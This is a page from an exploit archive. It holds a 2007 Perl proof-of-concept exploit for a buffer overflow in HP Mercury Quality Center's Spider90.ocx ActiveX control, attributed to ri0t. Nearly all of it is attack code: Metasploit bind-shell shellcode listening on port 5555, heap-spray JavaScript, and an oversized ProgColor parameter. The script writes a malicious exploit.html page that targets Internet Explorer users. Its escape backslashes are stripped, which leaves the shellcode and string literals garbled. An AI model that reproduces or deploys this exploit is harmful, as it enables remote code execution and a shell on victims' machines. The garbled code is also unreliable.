HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit
# Published : 2007-04-04
# Author : ri0t
# Previous Title : FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)
# Next Title : AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)

#!/usr/bin/perl
# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit 
# Vulnerability found by Titon and Ri0t of Bastardlabs  

use strict;

# win32_bind LPORT = 5555 - Metasploit
my $shellcode =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45".
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49".
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d".
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66".
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61".
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40".
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32".
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6".
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09".
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0".
"x66x68x15xb3x66x53x89xe1x95x68xa4x1ax70xc7x57xff".
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53".
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff".
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64".
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89".
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab".
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51".
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53".
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6".
"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0";

my $jscript =
"<script>n" .
"shellcode = unescape("" . convert_shellcode($shellcode) ."");n" .
"bigblock = unescape("%u9090%u9090");n" .
"headersize = 20;n" .
"slackspace = headersize+shellcode.length;n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;n" .
"fillblock = bigblock.substring(0, slackspace);n" .
"block = bigblock.substring(0, bigblock.length-slackspace);n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;n" .
"memory = new Array();n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;n" .
"</script>";

my $header =
"<html>n" .
"<head>n" .
"</head>n" .
$jscript .
"<body>n";

my $footer =
"</body>n" .
"</html>";

my $body = 
"<OBJECT ID="MQC" CLASSID="CLSID:98c53984-8bf8-4d11-9b1c-c324fca9cade" CODEBASE="Spider90.ocx#Version=9,1,0,4353" WIDTH=100% HEIGHT=100%>n" .
"<PARAM NAME="ProgColor" value="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFFFx0dx0dx0dx0d">n" .
"</object>n" .
"</body>n" .
"</html>";

my $page = "xffxfe";	# magic number of M$ unicode file
my $c;


foreach $c (split //, ($header)) {
	$page = $page . $c . "x00";
}



foreach $c (split //, ($body . $footer)) {
	$page = $page . $c . "x00";
}

open (IE, ">", "exploit.html");

print IE $page;

close IE;

# This function copy from JSUnescape() code in Metasploit
sub convert_shellcode {
	my $data = shift;
	my $mode = shift() || 'LE';
	my $code = '';
	
	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	
	# Pad to an even number of bytes
	if (length($data) % 2 != 0) {
		$data .= substr($data, -1, 1);
	}
	
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));	
		if ($mode eq 'LE') {
			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
		} else {
			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
		}
		$idx += 2;
	}
	
	return $code;
}

# www.Syue.com [2007-04-04]